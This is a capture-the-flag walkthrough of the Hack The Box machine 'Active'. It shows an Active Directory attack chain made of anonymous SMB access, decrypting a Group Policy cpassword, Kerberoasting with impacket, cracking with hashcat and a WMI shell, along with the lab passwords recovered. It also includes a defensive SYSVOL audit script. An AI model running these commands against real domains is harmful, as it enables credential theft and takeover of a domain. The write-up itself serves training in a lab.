
Hack The Box: Active

Difficulty: Medium


Machine Creator: eks & mrb3n


Tools Used:


NMAP

SMBCLIENT

gpp-decrypt

smbmap

ldapsearch

GetUserSPNs.py

Hashcat

wmiexec.py

Task: To find User.txt and Root.txt


Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.100

The nmap scan shows us some interesting results: port 53 (Microsoft DNS), port 88 (Kerberos), and ports 389 and 3268 (LDAP). From this set of ports we can expect this server to be a domain controller for the domain active.htb.


SMB

SMB (port 445) is also open on this box, so let's see if we can access any shares.

smbclient -L //10.10.10.100

smbclient //10.10.10.100/Replication


After some trial and error, I was able to access the Replication share, which is a domain share, without supplying any credentials.


Browsing the share, we find the directory "Policies", which holds the domain's group policies. Inside it there is a Groups.xml file, and this file can contain some vital information.

Group Policy


The Groups.xml file is used in older versions of Windows to modify local accounts via Group Policy Preferences. In this file we can see that the policy updates the user active.htb\SVC_TGS and sets its password. The cpassword attribute holds an encrypted version of that password.

CPASSWORD

https://msdn.microsoft.com/en-us/library/cc422924.aspx


The weakness in cpassword is the encryption key: it is a fixed AES key that Microsoft published in its own documentation (linked above) and has never changed, so anyone who can read the share can decrypt the value offline with the tool gpp-decrypt. Microsoft removed the ability to store passwords in Group Policy Preferences with MS14-025, but Groups.xml files already sitting in SYSVOL keep their cpassword until someone cleans them up.
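As an added example (not part of the original writeup), here is a small Python audit that walks a copy of SYSVOL and reports every Group Policy Preference file still carrying a cpassword attribute, which is the check a defender would run to find leftovers like the one above. The sample Groups.xml is constructed and its cpassword is a placeholder; the account-attribute names for the other preference file types are assumptions based on their formats.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files under SYSVOL that can carry a cpassword attribute, and
# the attribute naming the account each file type acts on (the attribute name
# differs between preference types; assumed from the file formats).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element that carries a non-empty cpassword."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if not cpw:  # attribute absent or empty string: no stored password
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": account,
            "action": elem.get("action"),
            "cpassword_length": len(cpw),  # record presence, never the value
        })
    return findings

def audit_sysvol(sysvol_root):
    """Walk a SYSVOL copy and collect findings from every known GPP file."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            try:
                text = path.read_text(encoding="utf-8-sig")  # GPP files carry a BOM
                findings.extend(find_cpasswords(text, str(path)))
            except ET.ParseError:
                pass  # malformed file: skipped here, log it in real use
    return findings

# Constructed sample shaped like the Groups.xml described above; the cpassword
# value is a placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="UExBQ0VIT0xERVI=" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""
```

Call `find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml")` to see a single finding for the Properties element, or `audit_sysvol("/path/to/sysvol")` against a mounted or copied share.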

SMBMAP

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100

With user credentials, we can run smbmap to see which shares we now have access to.

LDAPSEARCH

ldapsearch -x -h 10.10.10.100 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(servicePrincipalName=*/*))" servicePrincipalName | grep -B 1 servicePrincipalName


With ldapsearch we can find any users that have a Service Principal Name (SPN) set. The filter restricts the results to enabled user accounts (the userAccountControl bit 2, "account disabled", must be clear) whose SPN contains a slash.

GetUserSPNs.py

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py

https://github.com/SecureAuthCorp/impacket/tree/master/impacket

python GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request

GetUserSPNs.py from impacket requests a Kerberos service ticket for each account that has an SPN and prints it in a crackable format; on this box that gives us a ticket for the Administrator account. Now we need to crack this hash.

Hashcat

hashcat64.exe -a 0 -m 13100 active_hash.txt rockyou.txt

I put the hash from the previous step in a text file so we can run it through hashcat (mode 13100, Kerberos 5 TGS-REP). In this instance I am using the Windows version so I can take advantage of my Nvidia 1060 graphics card; your command will vary depending on your setup. After a couple of seconds, the hash is cracked to reveal the password "Ticketmaster1968".

wmiexec.py

python wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100

We now have the credentials for Administrator; however, this server does not have RDP enabled. The impacket examples directory also contains wmiexec.py, which gives us a command shell over WMI.

User.txt/Root.txt